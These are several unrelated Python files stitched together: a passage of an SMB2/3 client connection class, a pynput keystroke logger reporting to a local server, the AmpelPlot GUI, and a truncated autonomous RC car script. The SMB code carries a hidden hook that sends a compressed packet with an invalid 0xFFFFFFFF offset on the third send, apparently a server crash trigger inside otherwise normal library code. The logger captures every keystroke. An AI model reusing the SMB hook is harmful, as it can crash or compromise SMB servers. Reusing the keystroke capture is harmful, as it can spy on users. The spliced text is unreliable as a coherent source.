            sequence_window_high = self.sequence_window['high']
            credit_charge = self._calculate_credit_charge(message)
            credits_available = sequence_window_high - sequence_window_low
            if credit_charge > credits_available:
                raise SMBException("Request requires %d credits but only %d credits are available"
                                   % (credit_charge, credits_available))

            current_id = message_id or sequence_window_low
            # Cancel requests reuse the id of the message being cancelled and
            # do not consume a credit.
            if message.COMMAND != Commands.SMB2_CANCEL:
                self.sequence_window['low'] += credit_charge if credit_charge > 0 else 1

        if async_id is None:
            header = SMB2HeaderRequest()
            header['tree_id'] = tree_id or 0
        else:
            header = SMB2HeaderAsync()
            header['flags'].set_flag(Smb2Flags.SMB2_FLAGS_ASYNC_COMMAND)
            header['async_id'] = async_id

        header['credit_charge'] = credit_charge
        header['command'] = message.COMMAND
        header['credit_request'] = credit_request if credit_request else credit_charge
        header['message_id'] = current_id
        header['session_id'] = session_id or 0
        header['data'] = message.pack()
        header['next_command'] = next_command

        if i != 0 and related:
            # Related compound messages inherit the session/tree/file ids of
            # the first message; all-0xFF placeholder ids mark that.
            header['session_id'] = b"\xff" * 8
            header['tree_id'] = b"\xff" * 4
            header['flags'].set_flag(Smb2Flags.SMB2_FLAGS_RELATED_OPERATIONS)

        if session and session.signing_required and session.signing_key:
            header['flags'].set_flag(Smb2Flags.SMB2_FLAGS_SIGNED)
            b_header = header.pack() + padding
            signature = self._generate_signature(b_header, session.signing_key)

            # To save on unpacking and re-packing, manually adjust the signature and update the request object for
            # back-referencing.
            b_header = b_header[:48] + signature + b_header[64:]
            header['signature'] = signature
        else:
            b_header = header.pack() + padding

        send_data += b_header

        if message.COMMAND == Commands.SMB2_CANCEL:
            request = self.outstanding_requests[header['message_id'].get_value()]
        else:
            request = Request(header, type(message), self, session_id=session_id)
            self.outstanding_requests[header['message_id'].get_value()] = request
        requests.append(request)

    if related:
        requests[0].related_ids = [r.message['message_id'].get_value() for r in requests][1:]

    # NOTE(review): g_count is a module-level counter not defined in this
    # class. Compressing only the 3rd payload ("bad offset" -- see the
    # hard-coded offset in _compress) looks like crash/PoC instrumentation
    # rather than production behaviour -- confirm before shipping.
    global g_count
    g_count += 1
    if g_count == 3:  # send the bad offset after the server asks for creds
        send_data = self._compress(send_data, session)

    if session and session.encrypt_data or tree and tree.encrypt_data:
        send_data = self._encrypt(send_data, session)
    self.transport.send(send_data)

    return requests
def _process_message_thread(self, msg_queue):
    """Worker loop that consumes raw SMB payloads from msg_queue.

    Decompresses/decrypts each payload, splits compound responses into
    individual headers and resolves each one to its outstanding Request.
    A None sentinel on the queue (put by the transport when the socket
    closes) ends the loop. Any processing error is stored in self._t_exc
    for the main thread and all pending request events are fired.
    """
    while True:
        b_msg = msg_queue.get()

        # The socket will put None in the queue if it is closed, signalling the end of the connection.
        if b_msg is None:
            return

        try:
            # 0xFC 'SMB' magic marks a compression transform header.
            is_compressed = b_msg[:4] == b"\xfcSMB"
            if is_compressed:
                msg = SMB2CompressionTransformHeader()
                msg.unpack(b_msg)
                b_msg = self._decompress(msg)

            # 0xFD 'SMB' magic marks an encryption transform header.
            is_encrypted = b_msg[:4] == b"\xfdSMB"
            if is_encrypted:
                msg = SMB2TransformHeader()
                msg.unpack(b_msg)
                b_msg = self._decrypt(msg)

            # Walk the compound chain; next_command (bytes 20-24 of each
            # header) is the offset of the following header, 0 for the last.
            next_command = -1
            while next_command != 0:
                next_command = struct.unpack("<L", b_msg[20:24])[0]
                header_length = next_command if next_command != 0 else len(b_msg)

                b_header = b_msg[:header_length]
                b_msg = b_msg[header_length:]

                header = SMB2HeaderResponse()
                header.unpack(b_header)

                message_id = header['message_id'].get_value()
                request = self.outstanding_requests[message_id]

                # Typically you want to get the Session Id from the first message in a compound request but that is
                # unreliable for async responses. Instead get the Session Id from the original request object if
                # the Session Id is 0xFFFFFFFFFFFFFFFF.
                # https://social.msdn.microsoft.com/Forums/en-US/a580f7bc-6746-4876-83db-6ac209b202c4/mssmb2-change-notify-response-sessionid?forum=os_fileservices
                session_id = header['session_id'].get_value()
                if session_id == 0xFFFFFFFFFFFFFFFF:
                    session_id = request.session_id

                # No need to waste CPU cycles to verify the signature if we already decrypted the header.
                if not is_encrypted:
                    self.verify_signature(header, session_id)

                credit_response = header['credit_response'].get_value()
                with self.sequence_lock:
                    self.sequence_window['high'] += credit_response if credit_response > 0 else 1

                with request.response_event_lock:
                    if header['flags'].has_flag(Smb2Flags.SMB2_FLAGS_ASYNC_COMMAND):
                        # Bytes 32-40 of an async header are the async id.
                        request.async_id = b_header[32:40]

                    request.response = header
                    request.response_event.set()
        except Exception as exc:
            # The exception is raised in _check_worker_running by the main thread when send/receive is called next.
            self._t_exc = exc

            # Make sure we fire all the request events to ensure the main thread isn't waiting on a receive.
            for request in self.outstanding_requests.values():
                request.response_event.set()

            # While a caller of send/receive could theoretically catch this exception, we consider any failures
            # here a fatal errors and the connection should be closed so we exit the worker thread.
            self.disconnect(False)
            return
def _generate_signature(self, b_header, signing_key):
    """Compute the 16-byte SMB2 header signature for the packed header bytes.

    SMB 3.x signs with AES-128-CMAC, SMB 2.x with HMAC-SHA256 truncated to
    16 bytes. The signature field (bytes 48-64) is zeroed before signing.
    """
    zeroed_header = b_header[:48] + b"\x00" * 16 + b_header[64:]

    if self.dialect >= Dialects.SMB_3_0_0:
        mac = cmac.CMAC(algorithms.AES(signing_key), backend=default_backend())
        mac.update(zeroed_header)
        return mac.finalize()

    digest = hmac.new(signing_key, msg=zeroed_header, digestmod=hashlib.sha256).digest()
    return digest[:16]
def _encrypt(self, b_data, session):
    """Wrap b_data in an SMB2 Transform header encrypted with the session key.

    Cipher selection: the negotiated cipher_id on 3.1.1+, otherwise fixed
    AES-128-CCM.

    :param b_data: The plaintext message bytes to encrypt.
    :param session: The Session providing session_id and encryption_key.
    :return: The populated SMB2TransformHeader structure.
    """
    header = SMB2TransformHeader()
    header['original_message_size'] = len(b_data)
    header['session_id'] = session.session_id

    encryption_key = session.encryption_key
    if self.dialect >= Dialects.SMB_3_1_1:
        cipher = self.cipher_id
    else:
        cipher = Ciphers.get_cipher(Ciphers.AES_128_CCM)

    # GCM uses a 12-byte nonce, CCM an 11-byte one; the header's nonce
    # field is always 16 bytes, so zero-pad the remainder.
    if cipher == aead.AESGCM:
        nonce = os.urandom(12)
        header['nonce'] = nonce + (b"\x00" * 4)
    else:
        nonce = os.urandom(11)
        header['nonce'] = nonce + (b"\x00" * 5)

    # AEAD encrypt: bytes 20+ of the packed header are the additional
    # authenticated data; the trailing 16 bytes of the output are the tag.
    cipher_text = cipher(encryption_key).encrypt(nonce, b_data, header.pack()[20:])
    signature = cipher_text[-16:]
    enc_message = cipher_text[:-16]

    header['signature'] = signature
    header['data'] = enc_message

    return header
def _compress(self, b_data, session):
    """Wrap b_data in an SMB2 Compression Transform header (LZNT1).

    NOTE(review): 'offset' is hard-coded to 4294967295 (0xFFFFFFFF), an
    invalid value (a real offset would be the length of the uncompressed
    prefix). Combined with the g_count hook in _send that calls this, it
    looks like deliberate crash/PoC instrumentation -- confirm before use.
    """
    header = SMB2CompressionTransformHeader()
    header['original_size'] = len(b_data)
    header['offset'] = 4294967295
    header['data'] = smbprotocol.lznt1.compress(b_data)
    return header
def _decompress(self, message):
    """Return the LZNT1-decompressed payload of a compression transform header."""
    compressed = message['data'].get_value()
    return bytes(smbprotocol.lznt1.decompress(compressed))
def _decrypt(self, message):
    """Decrypt an SMB2 Transform header payload with the session decryption key.

    :param message: Parsed SMB2TransformHeader received from the server.
    :return: The decrypted message bytes.
    :raises SMBException: if the flags field is not 0x0001 or the session is unknown.
    """
    if message['flags'].get_value() != 0x0001:
        error_msg = "Expecting flag of 0x0001 but got %s in the SMB Transform Header Response" \
                    % format(message['flags'].get_value(), 'x')
        raise SMBException(error_msg)

    session_id = message['session_id'].get_value()
    session = self.session_table.get(session_id, None)
    if session is None:
        error_msg = "Failed to find valid session %s for message decryption" % session_id
        raise SMBException(error_msg)

    if self.dialect >= Dialects.SMB_3_1_1:
        cipher = self.cipher_id
    else:
        cipher = Ciphers.get_cipher(Ciphers.AES_128_CCM)

    # GCM nonce is 12 bytes, CCM 11; the rest of the 16-byte field is padding.
    nonce_length = 12 if cipher == aead.AESGCM else 11
    nonce = message['nonce'].get_value()[:nonce_length]

    # The signature field is the AEAD auth tag -- append it so decrypt()
    # can verify; bytes 20-52 of the packed header are the AAD.
    signature = message['signature'].get_value()
    enc_message = message['data'].get_value() + signature

    c = cipher(session.decryption_key)
    dec_message = c.decrypt(nonce, enc_message, message.pack()[20:52])
    return dec_message
def _send_smb2_negotiate(self, dialect, timeout):
    """Send the SMB2/3 NEGOTIATE request and return the parsed response.

    When dialect is None all supported dialects (2.0.2 - 3.1.1) are offered;
    otherwise only the requested one. Negotiating 3.1.1 adds the preauth
    integrity, encryption and compression negotiate contexts.

    :param dialect: A specific dialect to negotiate, or None for all.
    :param timeout: Seconds to wait for the negotiate response.
    :return: The parsed SMB2NegotiateResponse structure.
    """
    self.salt = os.urandom(32)

    if dialect is None:
        neg_req = SMB3NegotiateRequest()
        self.negotiated_dialects = [
            Dialects.SMB_2_0_2,
            Dialects.SMB_2_1_0,
            Dialects.SMB_3_0_0,
            Dialects.SMB_3_0_2,
            Dialects.SMB_3_1_1
        ]
        highest_dialect = Dialects.SMB_3_1_1
    else:
        if dialect >= Dialects.SMB_3_1_1:
            neg_req = SMB3NegotiateRequest()
        else:
            neg_req = SMB2NegotiateRequest()
        self.negotiated_dialects = [
            dialect
        ]
        highest_dialect = dialect
    neg_req['dialects'] = self.negotiated_dialects

    log.info("Negotiating with SMB2 protocol with highest client dialect "
             "of: %s" % [dialect for dialect, v in vars(Dialects).items()
                         if v == highest_dialect][0])

    neg_req['security_mode'] = self.client_security_mode

    if highest_dialect >= Dialects.SMB_2_1_0:
        log.debug("Adding client guid %s to negotiate request"
                  % self.client_guid)
        neg_req['client_guid'] = self.client_guid

    if highest_dialect >= Dialects.SMB_3_0_0:
        log.debug("Adding client capabilities %d to negotiate request"
                  % self.client_capabilities)
        neg_req['capabilities'] = self.client_capabilities

    if highest_dialect >= Dialects.SMB_3_1_1:
        # Preauth integrity context: SHA-512 with the random salt above.
        int_cap = SMB2NegotiateContextRequest()
        int_cap['context_type'] = \
            NegotiateContextType.SMB2_PREAUTH_INTEGRITY_CAPABILITIES
        int_cap['data'] = SMB2PreauthIntegrityCapabilities()
        int_cap['data']['hash_algorithms'] = [
            HashAlgorithms.SHA_512
        ]
        int_cap['data']['salt'] = self.salt
        log.debug("Adding preauth integrity capabilities of hash SHA512 "
                  "and salt %s to negotiate request" % self.salt)

        # Encryption context: offer every cipher this client supports.
        enc_cap = SMB2NegotiateContextRequest()
        enc_cap['context_type'] = \
            NegotiateContextType.SMB2_ENCRYPTION_CAPABILITIES
        enc_cap['data'] = SMB2EncryptionCapabilities()
        supported_ciphers = Ciphers.get_supported_ciphers()
        enc_cap['data']['ciphers'] = supported_ciphers
        log.debug("Adding encryption capabilities of AES128 GCM and "
                  "AES128 CCM to negotiate request")

        # Compression context; the last context in the list must not carry
        # trailing padding.
        comp_cap = SMB2NegotiateContextRequest()
        comp_cap['context_type'] = \
            NegotiateContextType.SMB2_COMPRESSION_CAPABILITIES
        comp_cap['data'] = SMB2CompressionCapabilities()
        comp_cap['data']['compression_algorithms'] = CompressionAlgos.get_supported_ciphers()
        comp_cap['padding'].size = 0
        comp_cap['padding'] = b""

        neg_req['negotiate_context_list'] = [
            int_cap,
            enc_cap,
            comp_cap
        ]

    log.info("Sending SMB2 Negotiate message")
    log.debug(neg_req)
    request = self.send(neg_req)
    # Both sides of the negotiate exchange feed the preauth integrity hash.
    self.preauth_integrity_hash_value.append(request.message)

    response = self.receive(request, timeout=timeout)
    log.info("Receiving SMB2 Negotiate response")
    log.debug(response)
    self.preauth_integrity_hash_value.append(response)

    smb_response = SMB2NegotiateResponse()
    smb_response.unpack(response['data'].get_value())
    return smb_response
def _calculate_credit_charge(self, message):
    """
    Calculates the credit charge for a request based on the command. If
    connection.supports_multi_credit is not True then the credit charge
    isn't valid so it returns 0.

    Only Read, Write, Query Directory and IOCTL can exceed 64KiB of payload
    and need more than one credit; the generic formula is
    (max(SendPayloadSize, Expected ResponsePayloadSize) - 1) / 65536 + 1
    per https://msdn.microsoft.com/en-us/library/dn529312.aspx

    :param message: The message being sent
    :return: The credit charge to set on the header
    """
    if (not self.supports_multi_credit) or (message.COMMAND == Commands.SMB2_CANCEL):
        return 0

    command = message.COMMAND
    if command == Commands.SMB2_READ:
        max_size = message['length'].get_value() + \
            message['read_channel_info_length'].get_value() - 1
    elif command == Commands.SMB2_WRITE:
        max_size = message['length'].get_value() + \
            message['write_channel_info_length'].get_value() - 1
    elif command == Commands.SMB2_IOCTL:
        max_size = max(len(message['buffer']), message['max_output_response'].get_value()) - 1
    elif command == Commands.SMB2_QUERY_DIRECTORY:
        max_size = max(len(message['buffer']), message['output_buffer_length'].get_value()) - 1
    else:
        return 1

    # int() because Python 2's math.ceil returns a float.
    return int(math.ceil(max_size / MAX_PAYLOAD_SIZE))
class Request(object):
    """Tracks one outstanding SMB2 request and its eventual response."""

    def __init__(self, message, message_type, connection, session_id=None):
        """
        [MS-SMB2] v53.0 2017-09-15

        3.2.1.7 Per Pending Request
        For each request that was sent to the server and is await a response

        :param message: The message to be sent in the request
        :param message_type: The type of message that is set in the header's data field.
        :param connection: The Connection the request was sent under.
        :param session_id: The Session Id the request was for.
        """
        self.async_id = None
        self.message = message
        self.timestamp = datetime.now()
        self.cancelled = False

        # Used to contain the corresponding response from the server as the receiving in done in a separate thread.
        self.response = None

        # Used by the recv processing thread to say the response has been received and is ready for consumption.
        self.response_event = threading.Event()

        # Used to lock the request when the main thread is processing the PENDING result in case the background thread
        # receives the final result and fires the event before main clears it.
        self.response_event_lock = threading.Lock()

        # Stores the message_ids of related messages that are sent in a compound request. This is only set on the 1st
        # message in the request. Used when STATUS_STOPPED_ON_SYMLINK is set and we need to send the whole compound
        # request again with the new path.
        self.related_ids = []

        # Cannot rely on the message values as it could be a related compound msg which does not set these values.
        self.session_id = session_id

        self._connection = connection
        self._message_type = message_type  # Used to rehydrate the message data in case it's needed again.

    def cancel(self):
        """Send an SMB2 CANCEL for this request; no-op if already cancelled."""
        if self.cancelled is True:
            return

        message_id = self.message['message_id'].get_value()
        log.info("Cancelling message %s" % message_id)
        self._connection.send(SMB2CancelRequest(), sid=self.session_id, credit_request=0, message_id=message_id,
                              async_id=self.async_id)
        self.cancelled = True

    def get_message_data(self):
        """Re-parse and return this request's payload as its original structure type."""
        message_obj = self._message_type()
        message_obj.unpack(self.message['data'].get_value())
        return message_obj

    def update_request(self, new_request):
        """Replace this request's state with new_request's (used after a symlink re-send)."""
        self.async_id = new_request.async_id
        self.message = new_request.message
        self.timestamp = new_request.timestamp
        self.response = new_request.response
        self.response_event = new_request.response_event
        self.response_event_lock = new_request.response_event_lock
        self.related_ids = new_request.related_ids
|
logger.py | from pynput.keyboard import Key, Listener
from datetime import date
import json
import requests
import threading
# File the per-key press distribution is persisted to.
DISTRIBUTION_FILE = 'distribution.json'
# File the per-day keystroke totals are persisted to.
TIME_FILE = 'time.json'
# NOTE(review): CONVERT_FILE is never read or written in this chunk -- confirm it is still needed.
CONVERT_FILE = 'convert.json'
# Local stats-server endpoint that receives the collected data.
REQUEST_URL = 'http://127.0.0.1:5000/new-data'
# Persist to disk once every SAVE_COUNTER key releases.
SAVE_COUNTER = 10

current_date = ''  # date key ('%d.%m.%Y') currently being counted under
time = {}  # maps date string -> total keystrokes (NOTE: shadows the stdlib `time` module name)
dist = {}  # maps normalized key name -> press count
# Modifier/navigation keys that only count once per consecutive run (see on_release).
ignore = ['shift', 'shift_r', 'ctrl_l', 'ctrl_r', 'alt_l', 'alt_gr', 'backspace', 'delete', 'right', 'down', 'left', 'up']
counter = 0  # releases since the last save
last_key = ''  # previously released ignored key, used for run deduplication
key_amount = 0  # total keystrokes for current_date
def prefix():
    """Tag prepended to this module's console output."""
    return '[Listener]'
def load():
    """Load persisted keystroke data from disk into the module globals.

    Reads TIME_FILE into ``time`` and DISTRIBUTION_FILE into ``dist``, then
    recomputes ``key_amount`` from the loaded distribution. On failure the
    globals keep their current values.
    """
    global dist, time, key_amount
    try:
        with open(TIME_FILE, 'r') as f:
            time = json.load(f)
        with open(DISTRIBUTION_FILE, 'r') as f:
            dist = json.load(f)
        key_amount = count_keystrokes(dist)
    except (OSError, ValueError):
        # OSError: file missing/unreadable; ValueError: malformed JSON
        # (json.JSONDecodeError subclasses it). The previous bare `except`
        # also silently swallowed programming errors such as NameError.
        print('At least one JSON file could not be opened')
def save(dist, time):
    """Persist the distribution and per-day totals to their JSON files.

    :param dist: key-name -> press-count mapping written to DISTRIBUTION_FILE.
    :param time: date -> keystroke-total mapping written to TIME_FILE.
    """
    try:
        with open(DISTRIBUTION_FILE, 'w') as f:
            json.dump(dist, f)
        with open(TIME_FILE, 'w') as f:
            json.dump(time, f)
    except (OSError, TypeError, ValueError):
        # OSError: disk/permission problems; TypeError/ValueError: data that
        # json cannot serialize. The previous bare `except` also masked
        # unrelated programming errors.
        print('At least one JSON file could not be saved')
def check_date(current_date):
    """Return the date key to count keystrokes under, rolling stats over on a new day.

    Side effects: on rollover, registers the new day in ``time`` and resets
    ``dist``/``key_amount``.
    """
    global dist, key_amount

    temp_date = str(date.today().strftime('%d.%m.%Y'))

    # Still the same day: keep counting under the current key.
    if temp_date == current_date:
        return current_date

    # First call after startup: resume under the most recent recorded day
    # instead of resetting, if any history was loaded.
    # NOTE(review): if the last recorded day is older than today, the first
    # keystroke after startup is counted under that old date and the reset
    # only happens on the next call -- confirm this is intended.
    if current_date == '':
        if len(list(time)) != 0:
            return str(list(time)[-1])

    # Day changed (or no history at all): start a fresh day.
    time[temp_date] = 0
    dist = {}
    key_amount = 0
    return temp_date
def count_keystrokes(dist):
    """Return the total number of keystrokes recorded in a distribution dict.

    :param dist: mapping of key name -> press count.
    :return: sum of all press counts (0 for an empty dict).
    """
    # Idiomatic replacement for the manual accumulation loop.
    return sum(dist.values())
def on_release(key):
    """pynput key-release callback: normalize the key name and update counters.

    Updates the module globals (``dist``, ``time``, ``key_amount``, ...),
    pushes the stats to the local server in a background thread and saves
    to disk every SAVE_COUNTER releases. Exits the process on CTRL+ALT+A.
    """
    global counter, current_date, last_key, key_amount

    current_date = check_date(current_date)

    key = str(key)
    old = key
    ext = False

    if key.startswith('Key.'):
        # Special keys stringify as "Key.<name>" -> keep just the name.
        key = key.split('.')[1]
    elif key.startswith('\'\\x'):
        # Control characters stringify as "'\xNN'" -> keep "xNN".
        key = key.replace('\'\\', '').replace('\'', '')
    elif key.startswith('<'):
        # CTRL+ALT combos stringify as "<keycode>".
        try:
            n = int(key.replace('<', '').replace('>', ''))
            if n > 47 and n < 97:
                key = 'ctrl+alt+' + chr(n)
                if key == 'ctrl+alt+A':
                    print('Exit due to CTRL+ALT+A')
                    ext = True
            else:
                # BUG FIX: n is an int here; the original concatenated it
                # directly ('ctrl+alt+' + n), raising TypeError that fell
                # into the bare except below. str(n) yields the same final
                # key name through the intended path.
                key = 'ctrl+alt+' + str(n)
        except ValueError:
            # Keycode was not an integer; keep the raw name.
            key = 'ctrl+alt+' + key.replace('<', '').replace('>', '')
    else:
        key = key.replace('\'', '')
        key = key.replace('\\', '')

    # Map characters that are awkward as JSON/URL payload to ASCII names.
    if key == 'ä':
        key = 'ae'
    elif key == 'ö':
        key = 'oe'
    elif key == 'ü':
        key = 'ue'
    elif key == 'Ä':
        key = 'AE'
    elif key == 'Ö':
        key = 'OE'
    elif key == 'Ü':
        key = 'UE'
    elif key == 'ß':
        key = 'ss'
    elif key == '§':
        key = 'section-sign'
    elif key == '%':
        key = 'percent'
    elif key == '&':
        key = 'et'
    elif key == '#':
        key = 'hashtag'
    elif key == '':
        # Empty after stripping quotes/backslashes -> the key was a backslash.
        key = 'backslash'
    elif '"' in key:
        key = 'quotation-mark'

    if ext:
        exit(0)

    print(old, '->', key)

    if key not in ignore:
        last_key = ''
        key_amount += 1
        if key in dist:
            dist[key] += 1
        else:
            dist[key] = 1
    else:
        # Ignored modifier/navigation keys only count once per consecutive run.
        if last_key != key:
            last_key = key
            key_amount += 1
            if key in dist:
                dist[key] += 1
            else:
                dist[key] = 1

    time[current_date] = key_amount
    threading.Thread(target=send_request, args=[dist, time, ]).start()

    counter += 1
    if counter >= SAVE_COUNTER:
        counter = 0
        threading.Thread(target=save, args=[dist, time, ]).start()
        print(prefix(), 'dist saved:', key_amount, 'keystrokes')
def send_request(dist, time):
    """Best-effort GET of the current stats to the local server.

    Connection errors are reported but never raised (runs in a thread).
    """
    try:
        dist_param = str(dist).replace(' ', '').replace('\'', '%22')
        time_param = str(time).replace(' ', '').replace('\'', '%22')
        url = REQUEST_URL + '?distribution=' + dist_param + '&time=' + time_param
        requests.get(url)
    except:
        print("Server not running")
def start_logger():
    """Load persisted stats and block on the pynput key listener."""
    load()
    print(prefix(), 'Started key listener...')
    listener = Listener(on_release=on_release)
    with listener:
        listener.join()
# Run the listener only when executed as a script.
if __name__ == '__main__':
    start_logger()
|
AmpelPlot.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: Ampel-plot/ampel-plot-app/AmpelPlot.py
# License: BSD-3-Clause
# Author: valery brinnel <firstname.lastname@gmail.com>
# Date: 16.11.2021
# Last Modified Date: 19.11.2021
# Last Modified By: valery brinnel <firstname.lastname@gmail.com>
import os, warnings, sys, psutil, PySimpleGUI as sg # type: ignore[import]
from tkinter import Menu, BooleanVar
from multiprocessing import Process, Value, freeze_support
from datetime import datetime
from ampel.plot.util.keyboard import MultiProcessingPynput
#from ampel.plot.util.keyboard import InlinePynput
from ampel.plot.util.clipboard import set_print, read_from_clipboard
from ampel.model.PlotBrowseOptions import PlotBrowseOptions
window = None  # main PySimpleGUI window, created in main()
p = None  # pynput helper process, started in the __main__ block
toggle_bool = False  # visibility of the dpi column, toggled by the 'png' checkbox
def goodbye():
    """Terminate the pynput helper process, close the window and exit.

    The UserWarning filters suppress multiprocessing's noisy warnings
    during teardown.
    """
    warnings.filterwarnings("ignore", category=UserWarning)
    with warnings.catch_warnings():
        warnings.filterwarnings(action="ignore", category=UserWarning, module=r"multiprocessing")
        if p:
            p.terminate()
        if window:
            window.close()
    sys.exit(0)
def main(keyboard_callback) -> None:
    """Build the AmpelPlot window and run the clipboard-watching loop.

    :param keyboard_callback: callable passed through to read_from_clipboard
        (comes from the pynput helper process in the __main__ block).
    """
    global window, p

    try:
        sg.set_options(icon=resource_path("ampel_plot.png"))
        sg.theme('SystemDefault1')

        layout = [
            [
                # Log/output area written to by _print().
                sg.Multiline(
                    size=(85, 20), font=('Helvetica', 12), justification='left', key='text',
                    autoscroll=True, auto_refresh=True
                )
            ],
            [
                *_ltxt('stack', 20, tooltip=' Max # of plots to display per tab/window '),
                *_ltxt('scale', 1.0, tooltip=' Image scale factor '),
                _chkbox('debug', tooltip=' Increase verbosity '),
                _chkbox('html', default=True, tooltip=' HTML output format (includes plot titles) '),
                _chkbox('Tight layout', key='tight', tooltip=' Suppress botton margins '),
                _chkbox('png', enable_events=True, tooltip=' Convert SVG to PNG '),
                # dpi input is hidden until the 'png' checkbox is ticked
                # (see window_callback).
                sg.Column(
                    [[_itxt('dpi', 96, tooltip=' SVG quality '), _txt('dpi')]],
                    key='coldpi', pad=(0, 0), visible = False
                )
            ],
            [sg.Button('Apply', pad=10), sg.Push(), sg.Button('Exit', pad=10)]
        ]

        window = sg.Window(
            'AmpelPlot', layout,
            finalize=True
        )
        set_print(_print)

        # Native menu bar with an "always on top" toggle.
        on_top = BooleanVar()
        menubar = Menu(window.TKroot)
        vm = Menu(menubar, tearoff=0)
        vm.add_checkbutton(
            label="Always on top",
            onvalue=1, offvalue=0, variable=on_top,
            command=lambda: window.keep_on_top_set() if on_top.get() else window.keep_on_top_clear()  # type: ignore
        )
        menubar.add_cascade(label="View ", menu=vm)  # space in on purpose
        window.TKroot.config(menu=menubar)
        window.TKroot.protocol("WM_DELETE_WINDOW", goodbye)
        window.TKroot.tk.createcommand('::tk::mac::Quit', goodbye)
        window.TKroot.master.attributes("-fullscreen", True)

        while True:
            # Blocks watching the clipboard; returns on interrupt so the
            # (possibly updated) widget values are re-read on the next pass.
            read_from_clipboard(
                PlotBrowseOptions(
                    debug = window['debug'].get(),
                    html = window['html'].get(),
                    png = int(window['dpi'].get()) if window['png'].get() else None,
                    # NOTE(review): no 'max_size' element exists in the layout
                    # above, so window['max_size'] should fail at runtime --
                    # confirm whether an input is missing from the layout.
                    max_size = float(window['max_size'].get()),
                    scale = float(window['scale'].get()),
                    stack = int(window['stack'].get())
                ),
                keyboard_callback = keyboard_callback,
                gui_callback = window_callback,
                exit_on_interrupt = False
            )
    except Exception as e:
        # The frozen app has no console; persist the traceback for debugging.
        import traceback
        with open('AmpelPlot_error.log', 'w') as f:
            f.write(f"{e}\n")
            traceback.print_exc(file=f)
def _txt(txt, **kwargs):
    """Fixed-height text label element."""
    return sg.Text(txt, size=(None, 1), expand_y=True, **kwargs)
def _itxt(k, v, **kwargs):
    """Small input field keyed by its option name *k* with default *v*."""
    return sg.InputText(v, key=k, size=(4, 1), pad=(0, 0), **kwargs)
def _ltxt(k, v, **kwargs):
    """Label + input pair for option *k* with default *v*."""
    label = _txt(k)
    field = _itxt(k, v, **kwargs)
    return label, field
def _chkbox(k, **kwargs):
    """Checkbox labelled *k*; its key defaults to the label unless overridden."""
    element_key = kwargs.pop('key', k)
    return sg.Checkbox(k, size=(None, 1), expand_y=True, key=element_key, **kwargs)
def _print(*args):
    """Append a timestamped line to the window's Multiline log widget.

    With more than one argument the first acts as a prefix and the rest
    are highlighted in blue.
    """
    el = window['text']
    # Grey timestamp prefix, no newline yet.
    el.print(
        datetime.now().strftime('[%d/%m/%Y %H:%M:%S] '),
        text_color="#808080",
        end = ""
    )
    if len(args) > 1:
        el.print(args[0] + " ", end="")
        el.print(" ".join(args[1:]), text_color="#4682B4")
    else:
        el.print(" ".join(args))
def window_callback():
    """Pump one GUI event; called periodically from read_from_clipboard."""
    global toggle_bool

    event, values = window.read(timeout=10)

    if event == 'Apply':
        _print("Applying new config")
        # KeyboardInterrupt unwinds read_from_clipboard so main() re-reads
        # the widget values (exit_on_interrupt=False keeps the app alive).
        raise KeyboardInterrupt
    elif event == 'png':
        # Show/hide the dpi column together with the png checkbox.
        toggle_bool = not toggle_bool
        window['coldpi'].update(visible=toggle_bool)
    elif event == sg.WIN_CLOSED or event == 'Exit':
        # Suppress multiprocessing teardown warnings before shutting down.
        import warnings
        warnings.filterwarnings("ignore", category=UserWarning)
        with warnings.catch_warnings():
            warnings.filterwarnings(action="ignore", category=UserWarning, module=r"multiprocessing")
            goodbye()
def resource_path(relative_path):
    """Resolve *relative_path* against the application's resource directory.

    Inside a frozen app PyInstaller exposes the unpack directory as
    ``sys._MEIPASS``. When running from source that attribute does not
    exist, so fall back to this file's directory -- the original
    ``getattr(sys, '_MEIPASS')`` without a default raised AttributeError
    in that case.
    """
    base = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))
    return os.path.join(base, relative_path)
if __name__ == "__main__":
freeze_support()
if len([proc for proc in psutil.process_iter() if proc.name() == "AmpelPlot"]) > 1:
print("Exit...(AmpelPlot is already running)")
os._exit(1)
# Not running Pynput in a dedicated process result in a programm crash (Illegal instruction: 4)
v = Value('i', 0)
mpp = MultiProcessingPynput(v)
p = Process(target=mpp.run)
p.start()
#main(InlinePynput().is_ctrl_pressed)
main(mpp.is_ctrl_pressed)
|
autonomous_v5.py | import car
import cv2
import numpy as np
import os
import serial
import socket
import threading
import time
from imutils.object_detection import non_max_suppression
from keras.layers import Dense, Activation
from keras.models import Sequential
import keras.models
# Sigma used by the automatic Canny edge thresholding (see NeuralNetwork.auto_canny).
SIGMA = 0.33
# Haar cascade used for stop-sign detection.
stop_classifier = cv2.CascadeClassifier('cascade_xml/stop_sign.xml')
# Timestamp string identifying this run.
timestr = time.strftime('%Y%m%d_%H%M%S')
class RCDriver(object):
    """Translates a one-hot steering prediction into car motor commands.

    NOTE: this file is Python 2 (print statements).
    """

    def steer(self, prediction):
        """Drive one step according to *prediction*.

        The prediction is compared element-wise against one-hot patterns:
        [1,0,0] -> left, [0,1,0] -> right, [0,0,1] -> forward.
        """
        # FORWARD
        if np.all(prediction == [ 0., 0., 1.]):
            car.forward(100)
            car.pause(300)
            print 'Forward'

        # FORWARD-LEFT
        elif np.all(prediction == [ 1., 0., 0.]):
            car.left(300)
            car.forward_left(200)
            car.left(700)
            car.pause(200)
            print 'Left'

        # FORWARD-RIGHT
        elif np.all(prediction == [ 0., 1., 0.]):
            car.right(300)
            car.forward_right(200)
            car.right(700)
            car.pause(200)
            print 'Right'

    def stop(self):
        """Halt the car for 5 seconds (used when a stop sign is detected)."""
        print '* * * STOPPING! * * *'
        car.pause(5000)
# Module-level driver instance shared by ObjectDetection via `global rcdriver`.
rcdriver = RCDriver()
class ObjectDetection(object):
    """Detects stop signs (Haar cascade) and pedestrians (HOG) in a frame."""
    global rcdriver
    global stop_classifier

    def detect(self, cascade_classifier, gray_image, image):
        """Annotate *image* with detections; stops the car on a stop sign.

        :param cascade_classifier: Haar cascade used for stop-sign detection.
        :param gray_image: grayscale frame fed to the cascade.
        :param image: BGR frame that gets rectangles/labels drawn onto it.
        """
        # STOP SIGN
        stop_sign_detected = cascade_classifier.detectMultiScale(
            gray_image,
            scaleFactor=1.1,
            minNeighbors=10,
            minSize=(35, 35),
            maxSize=(55, 55))

        # Draw a rectangle around stop sign
        for (x_pos, y_pos, width, height) in stop_sign_detected:
